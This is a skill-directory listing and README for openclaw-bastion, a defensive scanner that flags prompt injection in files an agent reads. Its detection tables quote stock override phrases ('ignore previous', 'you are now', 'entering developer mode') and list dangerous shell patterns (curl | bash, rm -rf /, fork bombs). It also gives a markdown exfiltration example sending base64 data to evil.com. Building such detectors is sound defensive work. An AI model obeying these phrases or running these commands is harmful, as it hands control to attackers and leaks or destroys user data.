by atlaspa

openclaw-bastion – OpenClaw Skill

openclaw-bastion is an OpenClaw Skills integration for coding workflows that provides prompt injection defense for agent workspaces. It scans files for injection attempts, analyzes content boundaries, detects hidden instructions, and maintains command allowlists. The free version is an alert layer only; upgrade to openclaw-bastion-pro for active blocking, sanitization, and runtime enforcement.

8.2k stars · 8.7k forks · Security L1
Updated Feb 7, 2026 · Created Feb 7, 2026 · coding

Skill Snapshot

name: openclaw-bastion
description: Prompt injection defense for agent workspaces. Scan files for injection attempts, analyze content boundaries, detect hidden instructions, and maintain command allowlists. Free alert layer; upgrade to openclaw-bastion-pro for active blocking, sanitization, and runtime enforcement. OpenClaw Skills integration.
owner: atlaspa
repository: atlaspa/openclaw-bastion
language: Markdown
license: MIT
security: L1
install: openclaw add @atlaspa/openclaw-bastion
last updated: Feb 7, 2026

Maintainer

atlaspa

Maintains openclaw-bastion in the OpenClaw Skills directory.

File Explorer

5 files

scripts/bastion.py (36.7 KB)
_meta.json (285 B)
README.md (4.8 KB)
SKILL.md (5.0 KB)

SKILL.md

name: openclaw-bastion
description: "Prompt injection defense for agent workspaces. Scan files for injection attempts, analyze content boundaries, detect hidden instructions, and maintain command allowlists. Free alert layer; upgrade to openclaw-bastion-pro for active blocking, sanitization, and runtime enforcement."
user-invocable: true
metadata: {"openclaw":{"emoji":"\ud83c\udfdb\ufe0f","requires":{"bins":["python3"]},"os":["darwin","linux","win32"]}}

OpenClaw Bastion

Runtime prompt injection defense for agent workspaces. While other tools watch workspace identity files, Bastion protects the input/output boundary — the files being read by the agent, web content, API responses, and user-supplied documents.

Why This Matters

Agents process content from many sources: local files, API responses, web pages, user uploads. Any of these can contain prompt injection attacks — hidden instructions that manipulate agent behavior. Bastion scans this content before the agent acts on it.

Need active blocking? Upgrade to openclaw-bastion-pro for runtime content sanitization, auto-quarantine, canary testing, and policy enforcement via hooks.

Commands

Scan for Injections

Scan files or directories for prompt injection patterns. Detects instruction overrides, system prompt markers, hidden Unicode, markdown exfiltration, HTML injection, shell injection, encoded payloads, delimiter confusion, multi-turn manipulation, and dangerous commands.

If no target is specified, scans the entire workspace.

python3 {baseDir}/scripts/bastion.py scan

Scan a specific file or directory:

python3 {baseDir}/scripts/bastion.py scan path/to/file.md
python3 {baseDir}/scripts/bastion.py scan path/to/directory/

Quick File Check

Fast single-file injection check. Same detection patterns as scan, targeted to one file.

python3 {baseDir}/scripts/bastion.py check path/to/file.md

Boundary Analysis

Analyze content boundary safety across the workspace. Identifies:

  • Agent instruction files that contain mixed trusted/untrusted content
  • Writable instruction files (attack surface for compromised skills)
  • Blast radius assessment for each critical file

python3 {baseDir}/scripts/bastion.py boundaries
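
The "writable instruction files" check can be pictured as a permission-bit test. The sketch below is an illustration only, not Bastion's actual logic: the function name `writable_instruction_files` and the `INSTRUCTION_FILES` list are assumptions chosen for the example.

```python
import stat
from pathlib import Path

# Hypothetical list of instruction files; Bastion's real list may differ.
INSTRUCTION_FILES = ("AGENTS.md", "SOUL.md", "IDENTITY.md")


def writable_instruction_files(workspace):
    """Return names of instruction files that have any write bit set."""
    write_bits = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH
    found = []
    for name in INSTRUCTION_FILES:
        path = Path(workspace) / name
        # A set write bit means some principal could modify the file.
        if path.is_file() and path.stat().st_mode & write_bits:
            found.append(name)
    return found
```

Checking mode bits rather than the current user's effective access keeps the result the same regardless of who runs the check, at the cost of ignoring ACLs and Windows-specific permissions.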

Command Allowlist

Display the current command allowlist and blocklist policy. Creates a default .bastion-policy.json if none exists.

python3 {baseDir}/scripts/bastion.py allowlist
python3 {baseDir}/scripts/bastion.py allowlist --show

The policy file defines which commands are considered safe and which patterns are blocked. Edit the JSON file directly to customize. Bastion Pro enforces this policy at runtime via hooks.

Status

Quick summary of workspace injection defense posture: files scanned, findings by severity, boundary safety, and overall posture rating.

python3 {baseDir}/scripts/bastion.py status

Workspace Auto-Detection

If --workspace is omitted, the script tries:

  1. OPENCLAW_WORKSPACE environment variable
  2. Current directory (if AGENTS.md exists)
  3. ~/.openclaw/workspace (default)
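
The fallback order above could be sketched roughly as follows. This is a minimal illustration under stated assumptions, not the code in bastion.py: the function name `resolve_workspace` and its parameters are hypothetical.

```python
import os
from pathlib import Path


def resolve_workspace(explicit=None, environ=None, cwd=None):
    """Resolve the workspace path using the documented fallback order."""
    environ = os.environ if environ is None else environ
    cwd = Path.cwd() if cwd is None else Path(cwd)

    if explicit:                                    # --workspace wins when given
        return Path(explicit)
    env_value = environ.get("OPENCLAW_WORKSPACE")
    if env_value:                                   # 1. environment variable
        return Path(env_value)
    if (cwd / "AGENTS.md").exists():                # 2. current directory
        return cwd
    return Path.home() / ".openclaw" / "workspace"  # 3. default
```

Passing `environ` and `cwd` as parameters is only a convenience for testing the order without touching the real environment.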

What Gets Detected

| Category | Patterns | Severity |
| --- | --- | --- |
| Instruction override | "ignore previous", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "act as if no restrictions", "entering developer mode" | CRITICAL |
| System prompt markers | <system>, [SYSTEM], <<SYS>>, <\|im_start\|>system, [INST], ### System: | CRITICAL |
| Hidden instructions | Multi-turn manipulation ("in your next response, you must"), stealth patterns ("do not tell the user") | CRITICAL |
| HTML injection | <script>, <iframe>, <img onerror=>, hidden divs, <svg onload=> | CRITICAL |
| Markdown exfiltration | Image tags with encoded data in URLs | CRITICAL |
| Dangerous commands | curl \| bash, wget \| sh, rm -rf /, fork bombs | CRITICAL |
| Unicode tricks | Zero-width characters, RTL overrides, invisible formatting | WARNING |
| Homoglyph substitution | Cyrillic/Latin lookalikes mixed into ASCII text | WARNING |
| Base64 payloads | Large encoded blobs outside code blocks | WARNING |
| Shell injection | $(command) subshell execution outside code blocks | WARNING |
| Delimiter confusion | Fake code block boundaries with injection content | WARNING |
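
To make the "Unicode tricks" row more concrete, here is a minimal sketch of how invisible and direction-changing characters might be located. The code point set and the function name `find_hidden_unicode` are assumptions for illustration; the set Bastion actually checks is not documented here.

```python
# Illustrative subset of invisible or direction-changing code points.
SUSPICIOUS_CODEPOINTS = {
    "\u200b": "ZERO WIDTH SPACE",
    "\u200c": "ZERO WIDTH NON-JOINER",
    "\u200d": "ZERO WIDTH JOINER",
    "\u2060": "WORD JOINER",
    "\ufeff": "ZERO WIDTH NO-BREAK SPACE",
    "\u202d": "LEFT-TO-RIGHT OVERRIDE",
    "\u202e": "RIGHT-TO-LEFT OVERRIDE",
}


def find_hidden_unicode(text):
    """Return (line_number, column, name) for each suspicious character."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in SUSPICIOUS_CODEPOINTS:
                findings.append((line_no, col, SUSPICIOUS_CODEPOINTS[ch]))
    return findings
```

Reporting line and column makes it possible to point a reviewer at a character they cannot otherwise see.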

Context-Aware Scanning

  • Patterns inside fenced code blocks (```) are skipped to avoid false positives
  • Per-file risk scoring based on finding count and severity
  • Self-exclusion: Bastion skips its own skill files (which describe injection patterns)
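
The fence-skipping behaviour can be sketched as a simple line scanner that toggles state on code fence markers. This is an assumption-laden illustration, not Bastion's implementation: `scan_outside_fences` and `OVERRIDE_PATTERNS` are hypothetical names, and only three of the listed phrases are included.

```python
import re

# Small illustrative subset of the instruction-override phrases.
OVERRIDE_PATTERNS = [
    re.compile(r"ignore\s+previous", re.IGNORECASE),
    re.compile(r"disregard\s+above", re.IGNORECASE),
    re.compile(r"forget\s+your\s+instructions", re.IGNORECASE),
]

FENCE = "`" * 3  # a markdown code fence marker


def scan_outside_fences(text):
    """Return (line_number, line) for matches outside fenced code blocks."""
    findings = []
    in_fence = False
    for line_no, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith(FENCE):
            in_fence = not in_fence  # toggle on opening and closing fences
            continue
        if in_fence:
            continue                 # documented examples are skipped
        if any(p.search(line) for p in OVERRIDE_PATTERNS):
            findings.append((line_no, line.strip()))
    return findings
```

A toggle like this treats an unclosed fence as extending to the end of the file, so a real scanner would likely need extra handling for the "delimiter confusion" case listed in the table.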

Exit Codes

| Code | Meaning |
| --- | --- |
| 0 | Clean, no issues |
| 1 | Warnings detected (review recommended) |
| 2 | Critical findings (action needed) |
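
These exit codes make the scanner easy to wire into a script or CI step. The wrapper below is a sketch only: `run_scan`, `should_fail_build`, and the `script_path` parameter are hypothetical names, and the choice to treat unexpected codes as failures is an assumption.

```python
import subprocess
import sys

# Meanings taken from the exit code table.
EXIT_MEANINGS = {0: "clean", 1: "warnings", 2: "critical"}


def run_scan(script_path, target=None):
    """Run `bastion.py scan` and return (exit_code, meaning)."""
    cmd = [sys.executable, script_path, "scan"]
    if target:
        cmd.append(target)
    result = subprocess.run(cmd)
    return result.returncode, EXIT_MEANINGS.get(result.returncode, "unknown")


def should_fail_build(exit_code, fail_on_warnings=False):
    """Decide whether a pipeline step should fail for a given exit code."""
    if exit_code == 0:
        return False
    if exit_code == 1:
        return fail_on_warnings
    return True  # 2 (critical) or any unexpected code
```

A caller might run `code, meaning = run_scan("scripts/bastion.py", "docs/")` and then exit non-zero when `should_fail_build(code)` is true.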

No External Dependencies

Python standard library only. No pip install. No network calls. Everything runs locally.

Cross-Platform

Works with OpenClaw, Claude Code, Cursor, and any tool using the Agent Skills specification.

README.md

OpenClaw Bastion

Free prompt injection defense for OpenClaw, Claude Code, and any Agent Skills-compatible tool.

Scans runtime content for injection attempts, analyzes content boundaries, detects hidden instructions, and maintains command allowlists — the input/output boundary defense that other tools miss.

Looking for active blocking and sanitization? See openclaw-bastion-pro for runtime content sanitization, auto-quarantine, canary testing, and policy enforcement via hooks.

How Bastion Differs from Warden

| Tool | Domain | What It Watches |
| --- | --- | --- |
| openclaw-warden | Workspace identity integrity | SOUL.md, AGENTS.md, IDENTITY.md, memory files: the files that define agent behavior |
| openclaw-bastion | Runtime content boundaries | Files being read by the agent, web content, API responses, user-supplied documents: everything the agent ingests |

Warden watches the identity layer. Bastion watches the content layer. Use both for defense in depth.

Install

# Clone
git clone https://github.com/AtlasPA/openclaw-bastion.git

# Copy to your workspace skills directory
cp -r openclaw-bastion ~/.openclaw/workspace/skills/

Usage

# Scan entire workspace for injection patterns
python3 scripts/bastion.py scan

# Scan a specific file or directory
python3 scripts/bastion.py scan path/to/file.md
python3 scripts/bastion.py scan docs/

# Quick single-file check
python3 scripts/bastion.py check report.md

# Analyze content boundaries
python3 scripts/bastion.py boundaries

# View command allowlist/blocklist
python3 scripts/bastion.py allowlist

# Quick posture summary
python3 scripts/bastion.py status

All commands accept --workspace /path/to/workspace. If omitted, auto-detects from $OPENCLAW_WORKSPACE, current directory, or ~/.openclaw/workspace.

What It Detects

Injection Patterns

  • Instruction override: "ignore previous instructions", "disregard above", "you are now", "new system prompt", "forget your instructions", "override safety", "entering developer mode"
  • System prompt markers: <system>, [SYSTEM], <<SYS>>, <|im_start|>system, [INST], ### System:
  • Hidden instructions: Multi-turn manipulation ("in your next response, you must..."), stealth patterns ("do not tell the user", "hide this from the output")
  • Markdown exfiltration: Image tags with encoded data in URLs (![](http://evil.com?data=BASE64))
  • HTML injection: <script>, <iframe>, <img onerror=>, <svg onload=>, hidden divs
  • Shell injection: $(command) subshell execution outside code blocks
  • Encoded payloads: Large base64 blobs outside code blocks
  • Unicode tricks: Zero-width characters, RTL overrides, invisible formatting
  • Homoglyph substitution: Cyrillic/Latin lookalikes mixed into ASCII text
  • Delimiter confusion: Fake markdown code block boundaries to escape context
  • Dangerous commands: curl | bash, wget | sh, rm -rf /, fork bombs
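
As an illustration of the markdown exfiltration pattern, a single regular expression can flag image tags whose URL carries a long encoded query value. This is a rough sketch, not Bastion's actual rule: the name `find_exfil_images` and the 40-character threshold are assumptions.

```python
import re

# Markdown image whose URL carries a long base64-like query value.
# The 40-character threshold is an arbitrary assumption for illustration.
EXFIL_IMAGE = re.compile(
    r"!\[[^\]]*\]\(\s*"                   # ![alt](
    r"(https?://[^\s)]*[?&][^=\s)]+="     # URL up to a query parameter name
    r"[A-Za-z0-9+/_-]{40,}={0,2}"         # long encoded value, optional padding
    r"[^\s)]*)\)"                         # rest of the URL and closing paren
)


def find_exfil_images(text):
    """Return URLs of markdown images that embed long encoded query data."""
    return [m.group(1) for m in EXFIL_IMAGE.finditer(text)]
```

Short query values such as cache-busting version numbers fall below the threshold and are not reported.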

Boundary Analysis

  • Agent instruction files containing mixed trusted/untrusted content
  • Writable instruction files (attack surface for compromised skills)
  • Blast radius assessment for each critical file

Smart Detection

  • Respects markdown fenced code blocks (no false positives on documented examples)
  • Per-file risk scoring (CLEAN / INFO / LOW / MEDIUM / HIGH / CRITICAL)
  • Skips its own skill files (which describe injection patterns)
  • Context-aware: only flags patterns in active content, not examples

Command Policy

Bastion maintains a .bastion-policy.json in the workspace root with:

  • Allowlist: Standard safe commands (git, python, node, npm, etc.)
  • Blocklist: Dangerous patterns (curl pipe to shell, rm -rf /, fork bombs, etc.)

Run allowlist to create the default policy and view it. Edit the JSON file directly to customize.
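
The schema of .bastion-policy.json is not shown in this README, so the following is purely a hypothetical sketch of how an allowlist and blocklist could be applied to a command string. The keys `allowlist` and `blocklist`, the example patterns, and the function `classify_command` are all assumptions, not the real file format.

```python
import re
import shlex

# Hypothetical policy shape; the real .bastion-policy.json schema may differ.
EXAMPLE_POLICY = {
    "allowlist": ["git", "python", "node", "npm"],
    "blocklist": [r"curl\b.*\|\s*(ba)?sh", r"rm\s+-rf\s+/(\s|$)"],
}


def classify_command(command, policy=EXAMPLE_POLICY):
    """Return 'blocked', 'allowed', or 'unknown' for a shell command string."""
    # Blocklist patterns are checked first so they override the allowlist.
    for pattern in policy["blocklist"]:
        if re.search(pattern, command):
            return "blocked"
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes and similar
        return "unknown"
    if tokens and tokens[0] in policy["allowlist"]:
        return "allowed"
    return "unknown"
```

Checking the blocklist before the allowlist means a dangerous pattern is reported even when the command starts with an otherwise safe program.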

Exit Codes

| Code | Meaning |
| --- | --- |
| 0 | Clean |
| 1 | Warnings detected |
| 2 | Critical findings |

Free vs Pro

| Feature | Free | Pro |
| --- | --- | --- |
| Injection pattern scanning | Yes | Yes |
| Boundary analysis | Yes | Yes |
| Command allowlist display | Yes | Yes |
| Per-file risk scoring | Yes | Yes |
| Context-aware detection | Yes | Yes |
| Active content sanitization | - | Yes |
| Runtime blocking via hooks | - | Yes |
| Auto-quarantine injected files | - | Yes |
| Canary token testing | - | Yes |
| Policy enforcement (PreToolUse) | - | Yes |
| Sanitize-on-read pipeline | - | Yes |
| Alerting and audit log | - | Yes |

Requirements

  • Python 3.8+
  • No external dependencies (stdlib only)
  • Cross-platform: Windows, macOS, Linux

License

MIT

Permissions & Security

Security level L1: Low-risk skills with minimal permissions. Review inputs and outputs before running in production.

Requirements

  • OpenClaw CLI installed and configured.
  • Language: Markdown
  • License: MIT

FAQ

How do I install openclaw-bastion?

Run openclaw add @atlaspa/openclaw-bastion in your terminal. This installs openclaw-bastion into your OpenClaw Skills catalog.

Does this skill run locally or in the cloud?

OpenClaw Skills execute locally by default. Review the SKILL.md and permissions before running any skill.

Where can I verify the source code?

The source repository is available at https://github.com/openclaw/skills/tree/main/skills/atlaspa/openclaw-bastion. Review commits and README documentation before installing.